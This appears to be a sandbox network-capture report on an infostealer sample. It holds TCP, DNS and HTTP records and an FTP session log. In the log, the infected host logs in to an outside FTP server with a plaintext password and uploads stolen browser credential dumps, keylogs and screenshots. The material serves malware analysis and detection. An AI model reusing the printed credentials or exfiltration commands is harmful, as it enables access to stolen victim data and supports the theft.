                                                      Oct 29, 2024 02:36:06.312777996 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.312798977 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.312859058 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.312910080 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.312927008 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.312937975 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.313000917 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.313020945 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.313051939 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.313075066 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.313102961 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.313129902 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.313185930 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.318166018 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318245888 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.318326950 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318356037 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318399906 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.318464041 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318490982 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318517923 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318557024 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.318588018 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.318665028 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318732023 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.318792105 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318883896 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.318911076 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.324764013 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.324794054 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.324820995 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.324847937 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.324879885 CET5135850043110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.324940920 CET5004351358192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.365060091 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.370794058 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.712308884 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.712694883 CET5004460708192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.718240976 CET6070850044110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:06.718321085 CET5004460708192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.718624115 CET5002421192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:06.723956108 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:07.065848112 CET2150038110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:07.109688997 CET5003821192.168.2.4110.4.45.197
                                                      Oct 29, 2024 02:36:07.634350061 CET2150024110.4.45.197192.168.2.4
                                                      Oct 29, 2024 02:36:07.683510065 CET5002421192.168.2.4110.4.45.197
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 29, 2024 02:32:01.504407883 CET5688053192.168.2.41.1.1.1
                                                      Oct 29, 2024 02:32:01.511888981 CET53568801.1.1.1192.168.2.4
                                                      Oct 29, 2024 02:32:04.164868116 CET5805853192.168.2.41.1.1.1
                                                      Oct 29, 2024 02:32:04.416140079 CET53580581.1.1.1192.168.2.4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 29, 2024 02:32:01.504407883 CET192.168.2.41.1.1.10x3d0dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Oct 29, 2024 02:32:04.164868116 CET192.168.2.41.1.1.10x27b8Standard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 29, 2024 02:32:01.511888981 CET1.1.1.1192.168.2.40x3d0dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Oct 29, 2024 02:32:01.511888981 CET1.1.1.1192.168.2.40x3d0dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Oct 29, 2024 02:32:01.511888981 CET1.1.1.1192.168.2.40x3d0dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Oct 29, 2024 02:32:04.416140079 CET1.1.1.1192.168.2.40x27b8No error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false
                                                      • api.ipify.org
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730104.26.12.2054436584C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-29 01:32:03 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-10-29 01:32:03 UTC211INHTTP/1.1 200 OK
                                                      Date: Tue, 29 Oct 2024 01:32:03 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 14
                                                      Connection: close
                                                      Vary: Origin
                                                      cf-cache-status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 8d9f68d898d12825-DFW
                                                      2024-10-29 01:32:03 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32
                                                      Data Ascii: 173.254.250.72


                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Oct 29, 2024 02:32:05.374852896 CET2149732110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:32. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                      Oct 29, 2024 02:32:05.375848055 CET4973221192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                      Oct 29, 2024 02:32:05.711447954 CET2149732110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                      Oct 29, 2024 02:32:05.711733103 CET4973221192.168.2.4110.4.45.197PASS JesusChrist007$
                                                      Oct 29, 2024 02:32:06.073821068 CET2149732110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                      Oct 29, 2024 02:32:06.409559965 CET2149732110.4.45.197192.168.2.4504 Unknown command
                                                      Oct 29, 2024 02:32:06.409715891 CET4973221192.168.2.4110.4.45.197PWD
                                                      Oct 29, 2024 02:32:06.745172024 CET2149732110.4.45.197192.168.2.4257 "/" is your current location
                                                      Oct 29, 2024 02:32:06.745539904 CET4973221192.168.2.4110.4.45.197TYPE I
                                                      Oct 29, 2024 02:32:07.081208944 CET2149732110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                      Oct 29, 2024 02:32:07.081500053 CET4973221192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:32:07.417788982 CET2149732110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,251,90)
                                                      Oct 29, 2024 02:32:07.423922062 CET4973221192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-965969_2024_10_28_21_52_02.txt
                                                      Oct 29, 2024 02:32:08.334458113 CET2149732110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:32:08.665770054 CET2149732110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.331 seconds (measured here), 9.90 Kbytes per second
                                                      Oct 29, 2024 02:32:08.666146994 CET4973221192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:32:09.004240036 CET2149732110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,252,248)
                                                      Oct 29, 2024 02:32:09.010472059 CET4973221192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-965969_2024_10_29_04_20_33.txt
                                                      Oct 29, 2024 02:32:09.898195028 CET2149732110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:32:10.231123924 CET2149732110.4.45.197192.168.2.4226 File successfully transferred
                                                      Oct 29, 2024 02:33:29.721076012 CET4973221192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:30.057517052 CET2149732110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,250,197)
                                                      Oct 29, 2024 02:33:30.063719034 CET4973221192.168.2.4110.4.45.197STOR KL_user-965969_2024_11_12_01_56_50.html
                                                      Oct 29, 2024 02:33:30.653919935 CET2149919110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:33. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:33. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:33. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:33. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                      Oct 29, 2024 02:33:30.654050112 CET4991921192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                      Oct 29, 2024 02:33:30.980927944 CET2149732110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:30.993021965 CET2149919110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                      Oct 29, 2024 02:33:30.993783951 CET4991921192.168.2.4110.4.45.197PASS JesusChrist007$
                                                      Oct 29, 2024 02:33:31.324520111 CET2149732110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.344 seconds (measured here), 0.81 Kbytes per second
                                                      Oct 29, 2024 02:33:31.351500034 CET2149919110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                      Oct 29, 2024 02:33:31.681971073 CET2149919110.4.45.197192.168.2.4504 Unknown command
                                                      Oct 29, 2024 02:33:31.682137012 CET4991921192.168.2.4110.4.45.197PWD
                                                      Oct 29, 2024 02:33:32.013760090 CET2149919110.4.45.197192.168.2.4257 "/" is your current location
                                                      Oct 29, 2024 02:33:32.013900042 CET4991921192.168.2.4110.4.45.197TYPE I
                                                      Oct 29, 2024 02:33:32.344786882 CET2149919110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                      Oct 29, 2024 02:33:32.344901085 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:32.675427914 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,228,199)
                                                      Oct 29, 2024 02:33:32.681360006 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_11_12_02_47_35.jpeg
                                                      Oct 29, 2024 02:33:33.589546919 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:34.361761093 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.772 seconds (measured here), 72.74 Kbytes per second
                                                      Oct 29, 2024 02:33:36.643965960 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:36.979012966 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,222,51)
                                                      Oct 29, 2024 02:33:36.985542059 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_11_17_09_30_22.jpeg
                                                      Oct 29, 2024 02:33:37.887609959 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:38.634644985 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.747 seconds (measured here), 75.20 Kbytes per second
                                                      Oct 29, 2024 02:33:41.394959927 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:41.725543022 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,219,249)
                                                      Oct 29, 2024 02:33:41.732429981 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_11_21_16_02_58.jpeg
                                                      Oct 29, 2024 02:33:42.631486893 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:43.404019117 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.772 seconds (measured here), 72.80 Kbytes per second
                                                      Oct 29, 2024 02:33:45.150866032 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:45.481455088 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,245,38)
                                                      Oct 29, 2024 02:33:45.487459898 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_11_25_12_04_17.jpeg
                                                      Oct 29, 2024 02:33:46.440191984 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:47.256100893 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.816 seconds (measured here), 73.28 Kbytes per second
                                                      Oct 29, 2024 02:33:48.978719950 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:49.494570971 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,199,162)
                                                      Oct 29, 2024 02:33:49.500956059 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_11_29_08_54_35.jpeg
                                                      Oct 29, 2024 02:33:49.986874104 CET4973221192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:50.323405981 CET2149732110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,240,183)
                                                      Oct 29, 2024 02:33:50.329338074 CET4973221192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_01_23_30_56.jpeg
                                                      Oct 29, 2024 02:33:50.394073009 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:51.149910927 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.756 seconds (measured here), 74.32 Kbytes per second
                                                      Oct 29, 2024 02:33:51.249042034 CET2149732110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:51.346889973 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:51.679275990 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,255,21)
                                                      Oct 29, 2024 02:33:51.687212944 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_04_18_33_13.jpeg
                                                      Oct 29, 2024 02:33:52.010952950 CET2149732110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.761 seconds (measured here), 73.84 Kbytes per second
                                                      Oct 29, 2024 02:33:52.583646059 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:53.349600077 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.766 seconds (measured here), 73.36 Kbytes per second
                                                      Oct 29, 2024 02:33:53.581366062 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:53.912455082 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,218,115)
                                                      Oct 29, 2024 02:33:53.922967911 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_10_07_21_44.jpeg
                                                      Oct 29, 2024 02:33:54.842539072 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:55.655571938 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.816 seconds (measured here), 68.89 Kbytes per second
                                                      Oct 29, 2024 02:33:57.330674887 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:33:57.662415981 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,248,23)
                                                      Oct 29, 2024 02:33:57.673137903 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_14_03_15_59.jpeg
                                                      Oct 29, 2024 02:33:58.598516941 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:33:59.388549089 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.792 seconds (measured here), 70.97 Kbytes per second
                                                      Oct 29, 2024 02:34:00.348042011 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:00.679722071 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,214,14)
                                                      Oct 29, 2024 02:34:00.685641050 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_17_17_13_05.jpeg
                                                      Oct 29, 2024 02:34:01.614918947 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:02.392740011 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.778 seconds (measured here), 72.24 Kbytes per second
                                                      Oct 29, 2024 02:34:06.626138926 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:06.959049940 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,207,90)
                                                      Oct 29, 2024 02:34:06.965001106 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_22_13_37_12.jpeg
                                                      Oct 29, 2024 02:34:07.904768944 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:08.725568056 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.821 seconds (measured here), 68.47 Kbytes per second
                                                      Oct 29, 2024 02:34:13.004611015 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:13.336118937 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,246,231)
                                                      Oct 29, 2024 02:34:13.343161106 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_27_13_22_30.jpeg
                                                      Oct 29, 2024 02:34:14.250581026 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:15.020529985 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.769 seconds (measured here), 73.03 Kbytes per second
                                                      Oct 29, 2024 02:34:17.753228903 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:18.086822987 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,238,18)
                                                      Oct 29, 2024 02:34:18.092997074 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2024_12_31_20_40_21.jpeg
                                                      Oct 29, 2024 02:34:18.999876022 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:19.758639097 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.760 seconds (measured here), 73.90 Kbytes per second
                                                      Oct 29, 2024 02:34:20.120454073 CET2150022110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 09:34. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 09:34. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 09:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 09:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                      Oct 29, 2024 02:34:20.120609045 CET5002221192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                      Oct 29, 2024 02:34:20.458786964 CET2150022110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                      Oct 29, 2024 02:34:20.458913088 CET5002221192.168.2.4110.4.45.197PASS JesusChrist007$
                                                      Oct 29, 2024 02:34:20.817456961 CET2150022110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                      Oct 29, 2024 02:34:21.156760931 CET2150022110.4.45.197192.168.2.4504 Unknown command
                                                      Oct 29, 2024 02:34:21.157984018 CET5002221192.168.2.4110.4.45.197PWD
                                                      Oct 29, 2024 02:34:21.497343063 CET2150022110.4.45.197192.168.2.4257 "/" is your current location
                                                      Oct 29, 2024 02:34:21.497560024 CET5002221192.168.2.4110.4.45.197TYPE I
                                                      Oct 29, 2024 02:34:21.835405111 CET2150022110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                      Oct 29, 2024 02:34:21.835557938 CET5002221192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:22.173280001 CET2150022110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,215,155)
                                                      Oct 29, 2024 02:34:22.181068897 CET5002221192.168.2.4110.4.45.197STOR SC_user-965969_2025_01_03_16_07_05.jpeg
                                                      Oct 29, 2024 02:34:23.084356070 CET2150022110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:32.446688890 CET4991921192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:32.779055119 CET2149919110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,239,18)
                                                      Oct 29, 2024 02:34:32.785063028 CET4991921192.168.2.4110.4.45.197STOR SC_user-965969_2025_01_13_23_47_12.jpeg
                                                      Oct 29, 2024 02:34:33.342677116 CET2150024110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:34. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:34. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 16 of 50 allowed.220-Local time is now 09:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                      Oct 29, 2024 02:34:33.346383095 CET5002421192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                      Oct 29, 2024 02:34:33.684034109 CET2149919110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:33.693028927 CET2150024110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                      Oct 29, 2024 02:34:33.693248034 CET5002421192.168.2.4110.4.45.197PASS JesusChrist007$
                                                      Oct 29, 2024 02:34:34.062570095 CET2150024110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                      Oct 29, 2024 02:34:34.413302898 CET2150024110.4.45.197192.168.2.4504 Unknown command
                                                      Oct 29, 2024 02:34:34.413419008 CET5002421192.168.2.4110.4.45.197PWD
                                                      Oct 29, 2024 02:34:34.443399906 CET2149919110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.760 seconds (measured here), 73.95 Kbytes per second
                                                      Oct 29, 2024 02:34:34.760296106 CET2150024110.4.45.197192.168.2.4257 "/" is your current location
                                                      Oct 29, 2024 02:34:34.760427952 CET5002421192.168.2.4110.4.45.197TYPE I
                                                      Oct 29, 2024 02:34:35.107671022 CET2150024110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                      Oct 29, 2024 02:34:35.113332987 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:35.460683107 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,236,141)
                                                      Oct 29, 2024 02:34:35.466751099 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_01_13_23_36_50.jpeg
                                                      Oct 29, 2024 02:34:36.404479027 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:37.200793982 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.794 seconds (measured here), 70.80 Kbytes per second
                                                      Oct 29, 2024 02:34:51.360970020 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:51.707825899 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,248,203)
                                                      Oct 29, 2024 02:34:51.717170000 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_01_26_12_09_48.jpeg
                                                      Oct 29, 2024 02:34:52.635413885 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:53.419935942 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.784 seconds (measured here), 71.63 Kbytes per second
                                                      Oct 29, 2024 02:34:54.502511024 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:54.849283934 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,209,67)
                                                      Oct 29, 2024 02:34:54.855336905 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_01_30_00_26_21.jpeg
                                                      Oct 29, 2024 02:34:55.787322998 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:34:56.590528011 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.802 seconds (measured here), 76.11 Kbytes per second
                                                      Oct 29, 2024 02:34:58.569979906 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:34:59.114371061 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,243,4)
                                                      Oct 29, 2024 02:34:59.120409012 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_02_02_22_59_11.jpeg
                                                      Oct 29, 2024 02:35:00.015770912 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:00.771889925 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.756 seconds (measured here), 74.30 Kbytes per second
                                                      Oct 29, 2024 02:35:05.870991945 CET5002421192.168.2.4110.4.45.197PASV
                                                      Oct 29, 2024 02:35:06.218086958 CET2150024110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,246,52)
                                                      Oct 29, 2024 02:35:06.224315882 CET5002421192.168.2.4110.4.45.197STOR SC_user-965969_2025_02_08_08_07_20.jpeg
                                                      Oct 29, 2024 02:35:07.134396076 CET2150024110.4.45.197192.168.2.4150 Accepted data connection
                                                      Oct 29, 2024 02:35:07.916733980 CET2150024110.4.45.197192.168.2.4226-File successfully transferred
                                                      226-File successfully transferred226 0.783 seconds (measured here), 77.90 Kbytes per second
                                                      Oct 29, 2024 02:35:09.895121098 CET5002421192.168.2.4110.4.45.197PASV
